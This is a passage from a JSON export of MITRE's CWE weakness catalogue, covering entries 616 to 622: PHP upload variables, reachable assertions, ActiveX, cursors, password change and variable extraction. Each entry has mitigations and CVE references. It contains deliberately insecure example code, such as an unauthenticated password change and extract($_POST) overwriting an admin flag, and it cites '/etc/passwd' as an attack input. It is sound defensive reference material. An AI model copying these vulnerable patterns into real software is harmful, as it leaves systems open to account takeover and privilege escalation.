Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Comments","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Comments","attr":{"@_Date":"2020-02-24"}}]}},"616":{"attr":{"@_ID":"616","@_Name":"Incomplete Identification of Uploaded File Variables (PHP)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The PHP application uses an old method for processing uploaded files by referencing the four global variables that are set for each file (e.g. $varname, $varname_size, $varname_name, $varname_type). These variables could be overwritten by attackers, causing the application to process unauthorized files.","Extended_Description":"These global variables could be overwritten by POST requests, cookies, or other methods of populating or overwriting these variables. This could be used to read or process arbitrary files by providing values such as \\"/etc/passwd\\".","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"473","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use PHP 4 or later."},{"Phase":"Architecture and Design","Description":"If you must support older PHP versions, write your own version of is_uploaded_file() and run it against $HTTP_POST_FILES[\'userfile\']))"},{"Phase":"Implementation","Description":"For later PHP versions, reference uploaded files using the $HTTP_POST_FILES or $_FILES variables, and use is_uploaded_file() or move_uploaded_file() to ensure that you are dealing with an uploaded file."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"As of 2006, the \\"four globals\\" method is probably in sharp decline, but older PHP applications could have this issue.","Body_Text":"In the \\"four globals\\" method, PHP sets the following 4 global variables (where \\"varname\\" is application-dependent):","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$varname = name of the temporary file on local machine$varname_size = size of file$varname_name = original name of file provided by client$varname_type = MIME type of the file","xhtml:br":["","",""]}}},{"Intro_Text":"\\"The global $_FILES exists as of PHP 4.1.0 (Use $HTTP_POST_FILES instead if using an earlier version). These arrays will contain all the uploaded file information.\\"","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$_FILES[\'userfile\'][\'name\'] - original filename from client$_FILES[\'userfile\'][\'tmp_name\'] - the temp filename of the file on the server","xhtml:br":""}},"Body_Text":"** note: \'userfile\' is the field name from the web form; this can vary."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1460","Description":"Forum does not properly verify whether a file was uploaded or if the associated variables were set by POST, allowing remote attackers to read arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1460"},{"Reference":"CVE-2002-1759","Description":"Product doesn\'t check if the variables for an upload were set by uploading the file, or other methods such as $_POST.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1759"},{"Reference":"CVE-2002-1710","Description":"Product does not distinguish uploaded file from other files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1710"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Identification of Uploaded File Variables (PHP)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-502"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"617":{"attr":{"@_ID":"617","@_Name":"Reachable Assertion","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary.","Extended_Description":{"xhtml:p":["While assertion is good for catching logic errors and reducing the chances of reaching more serious vulnerability conditions, it can still lead to a denial of service.","For example, if a server handles multiple simultaneous connections, and an assert() occurs in one single connection that causes all other connections to be dropped, this is a reachable assertion that leads to a denial of service."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Alternate_Terms":{"Alternate_Term":{"Term":"assertion failure"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"An attacker that can trigger an assert statement can still lead to a denial of service if the relevant code can be triggered by an attacker, and if the scope of the assert() extends beyond the attacker\'s own session."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Make sensitive open/close operation non reachable by directly user-controlled data (e.g. open/close resources)"},{"Phase":"Implementation","Strategy":"Input Validation","Description":"Perform input validation on user data."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the excerpt below, an AssertionError (an unchecked exception) is thrown if the user hasn\'t entered an email address in an HTML form.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String email = request.getParameter(\\"email_address\\");assert email != null;","xhtml:br":""}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-6767","Description":"FTP server allows remote attackers to cause a denial of service (daemon abort) via crafted commands which trigger an assertion failure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6767"},{"Reference":"CVE-2006-6811","Description":"Chat client allows remote attackers to cause a denial of service (crash) via a long message string when connecting to a server, which causes an assertion failure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6811"},{"Reference":"CVE-2006-5779","Description":"Product allows remote attackers to cause a denial of service (daemon crash) via LDAP BIND requests with long authcid names, which triggers an assertion failure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5779"},{"Reference":"CVE-2006-4095","Description":"Product allows remote attackers to cause a denial of service (crash) via certain queries, which cause an assertion failure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4095"},{"Reference":"CVE-2006-4574","Description":"Chain: security monitoring product has an off-by-one error that leads to unexpected length values, triggering an assertion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4574"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET01-J","Entry_Name":"Never use assertions to validate method arguments"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Alternate_Terms"}]}},"618":{"attr":{"@_ID":"618","@_Name":"Exposed Unsafe ActiveX Method","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"An ActiveX control is intended for use in a web browser, but it exposes dangerous methods that perform actions that are outside of the browser\'s security model (e.g. the zone or domain).","Extended_Description":"ActiveX controls can exercise far greater control over the operating system than typical Java or javascript. Exposed methods can be subject to various vulnerabilities, depending on the implemented behaviors of those methods, and whether input validation is performed on the provided arguments. If there is no integrity checking or origin validation, this method could be invoked by attackers.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"749","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"If you must expose a method, make sure to perform input validation on all arguments, and protect against all possible vulnerabilities."},{"Phase":"Architecture and Design","Description":"Use code signing, although this does not protect against any weaknesses that are already in the control."},{"Phase":["Architecture and Design","System Configuration"],"Description":"Where possible, avoid marking the control as safe for scripting."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-1120","Description":"download a file to arbitrary folders.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1120"},{"Reference":"CVE-2006-6838","Description":"control downloads and executes a url in a parameter","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6838"},{"Reference":"CVE-2007-0321","Description":"resultant buffer overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0321"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-503"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 12, "ActiveX Security", Page 749"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships"}]}},"619":{"attr":{"@_ID":"619","@_Name":"Dangling Database Cursor (\'Cursor Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"If a database cursor is not closed properly, then it could become accessible to other users while retaining the same privileges that were originally assigned, leaving the cursor \\"dangling.\\"","Extended_Description":"For example, an improper dangling cursor could arise from unhandled exceptions. The impact of the issue depends on the cursor\'s role, but SQL injection attacks are commonly possible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"402","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"This could be primary when the programmer never attempts to close the cursor when finished with it."},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"SQL","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"A cursor is a feature in Oracle PL/SQL and other languages that provides a handle for executing and accessing the results of SQL queries."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This issue is currently reported for unhandled exceptions, but it is theoretically possible any time the programmer does not close the cursor at the proper time."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Close cursors immediately after access to them is complete. Ensure that you close cursors if exceptions occur."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-505"}},{"attr":{"@_External_Reference_ID":"REF-506"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Dangling Database Cursor (Cursor Injection)","attr":{"@_Date":"2008-04-11"}},{"#text":"Dangling Database Cursor (aka \'Cursor Injection\')","attr":{"@_Date":"2009-05-27"}}]}},"620":{"attr":{"@_ID":"620","@_Name":"Unverified Password Change","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"When setting a new password for a user, the product does not require knowledge of the original password, or using another form of authentication.","Extended_Description":"This could be used by an attacker to change passwords for another user, thus gaining the privileges associated with that user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When prompting for a password change, force the user to provide the original password in addition to the new password."},{"Phase":"Architecture and Design","Description":"Do not use \\"forgotten password\\" functionality. But if you must, ensure that you are only providing information to the actual user, e.g. by using an email address or challenge question that the legitimate user already provided in the past; do not allow the current user to change this identity information until the correct password has been provided."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-56"},"Intro_Text":"This code changes a user\'s password.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$user = $_GET[\'user\'];$pass = $_GET[\'pass\'];$checkpass = $_GET[\'checkpass\'];if ($pass == $checkpass) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"SetUserPassword($user, $pass);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"While the code confirms that the requesting user typed the same new password twice, it does not confirm that the user requesting the password change is the same user whose password will be changed. An attacker can request a change of another user\'s password and gain control of the victim\'s account."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0681","Description":"Web app allows remote attackers to change the passwords of arbitrary users without providing the original password, and possibly perform other unauthorized actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0681"},{"Reference":"CVE-2000-0944","Description":"Web application password change utility doesn\'t check the original password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0944"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP31","Entry_Name":"Missing authentication"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 19: Use of Weak Password-Based Systems." Page 279"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}]}},"621":{"attr":{"@_ID":"621","@_Name":"Variable Extraction Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses external input to determine the names of variables into which information is extracted, without verifying that the names of the specified variables are valid. This could cause the program to overwrite unintended variables.","Extended_Description":{"xhtml:p":["For example, in PHP, extraction can be used to provide functionality similar to register_globals, a dangerous functionality that is frequently disabled in production systems. Calling extract() or import_request_variables() without the proper arguments could allow arbitrary global variables to be overwritten, including superglobals.","Similar functionality is possible in other interpreted languages, including custom languages."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"914","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Variable overwrite"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could modify sensitive data or program variables."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Use allowlists of variable names that can be extracted."},{"Phase":"Implementation","Description":"Consider refactoring your code to avoid extraction routines altogether."},{"Phase":"Implementation","Description":"In PHP, call extract() with options such as EXTR_SKIP and EXTR_PREFIX_ALL; call import_request_variables() with a prefix argument. Note that these capabilities are not present in all PHP versions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-107"},"Intro_Text":"This code uses the credentials sent in a POST request to login a user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function login($user,$pass){}$isAdmin = false;extract($_POST);login(mysql_real_escape_string($user),mysql_real_escape_string($pass));","xhtml:i":"//Log user in, and set $isAdmin to true if user is an administrator","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"$query = buildQuery($user,$pass);mysql_query($query);if(getUserRole($user) == \\"Admin\\"){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"$isAdmin = true;","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"The call to extract() will overwrite the existing values of any variables defined previously, in this case $isAdmin. An attacker can send a POST request with an unexpected third value \\"isAdmin\\" equal to \\"true\\", thus gaining Admin privileges."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-7135","Description":"extract issue enables file inclusion","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7135"},{"Reference":"CVE-2006-7079","Description":"extract used for register_globals compatibility layer, enables path traversal","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7079"},{"Reference":"CVE-2007-0649","Description":"extract() buried in include files makes post-disclosure analysis confusing; original report had seemed incorrect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0649"},{"Reference":"CVE-2006-6661","Description":"extract() enables static code injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6661"},{"Reference":"CVE-2006-2828","Description":"import_request_variables() buried in include files makes post-disclosure analysis confusing","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2828"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Notes":{"Note":{"#text":"Probably under-reported for PHP. Under-studied for other interpreted languages.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"622":{"attr":{"@_ID":"622","@_Name":"Improper Validation of Function Hook Arguments","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product adds hooks to user-accessible API functions, but it does not properly validate the arguments. This could lead to resultant vulnerabilities.","Extended_Description":"Such hooks can be used in defensive software that runs with privileges, such as anti-virus or firewall, which hooks kernel calls. When the arguments are not validated, they could be used to bypass the protection scheme or attack the product itself.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that all arguments are verified, as defined by the API you are protecting."},{"Phase":"Architecture and Design","Description":"Drop privileges before invoking such functions, if possible."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0708","Description":"DoS in firewall using standard Microsoft 